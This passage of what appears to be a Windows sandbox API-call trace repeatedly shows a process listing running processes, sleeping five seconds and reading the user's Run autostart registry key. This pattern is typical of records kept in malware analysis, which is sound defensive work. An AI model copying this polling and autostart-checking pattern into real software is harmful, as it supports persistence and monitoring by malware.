FreeType=0x8000) returned 0x0 [0178.965] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0178.965] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0178.967] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0178.968] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0178.979] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0178.979] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0178.979] NtClose (Handle=0x154) returned 0x0 [0178.979] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0178.980] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0178.980] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0178.981] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0178.981] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0178.983] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0178.983] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0178.995] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0178.995] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0178.995] NtClose (Handle=0x154) returned 0x0 [0178.996] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0178.996] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0178.996] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0178.997] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0178.997] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0178.999] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0179.000] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0179.016] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0179.016] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0179.017] NtClose (Handle=0x154) returned 0x0 [0179.017] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0179.017] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0179.018] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0179.018] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0179.018] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0179.020] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0179.021] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0179.026] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0179.026] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0179.026] NtClose (Handle=0x154) returned 0x0 [0179.026] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0179.027] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0179.027] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0179.028] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0179.028] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0179.030] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0179.031] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0179.042] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0179.042] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0179.042] NtClose (Handle=0x154) returned 0x0 [0179.042] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0179.042] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0179.043] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0179.043] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0179.043] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0179.045] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0179.046] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0179.057] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0179.057] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0179.057] NtClose (Handle=0x154) returned 0x0 [0179.057] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0179.058] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0179.058] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0179.058] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0179.059] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0179.061] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0179.061] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0179.073] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0179.073] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0179.073] NtClose (Handle=0x154) returned 0x0 [0179.073] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0179.073] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0179.074] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0179.074] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0179.074] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0179.076] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0179.076] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0179.088] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0179.088] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0179.088] NtClose (Handle=0x154) returned 0x0 [0179.088] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0179.089] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0179.089] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0179.089] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0179.090] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0179.092] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0179.092] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0179.105] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0179.105] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0179.105] NtClose (Handle=0x154) returned 0x0 [0179.105] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0179.106] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0179.106] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0179.106] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0179.107] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0179.109] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0179.110] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0179.120] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0179.120] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0179.120] NtClose (Handle=0x154) returned 0x0 [0179.120] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0179.120] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0179.121] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0179.121] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0179.121] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0179.123] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0179.124] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0179.135] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0179.135] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0179.135] NtClose (Handle=0x154) returned 0x0 [0179.135] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0179.136] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0179.136] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0179.137] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0179.137] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0179.138] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0179.139] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0179.151] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0179.151] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0179.151] NtClose (Handle=0x154) returned 0x0 [0179.151] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0179.152] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0179.152] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0179.152] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0179.152] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0179.154] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0179.155] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0179.166] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0179.167] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0179.167] NtClose (Handle=0x154) returned 0x0 [0179.167] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0179.167] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0179.168] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0179.168] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0179.168] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0179.170] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0179.171] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0179.182] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, 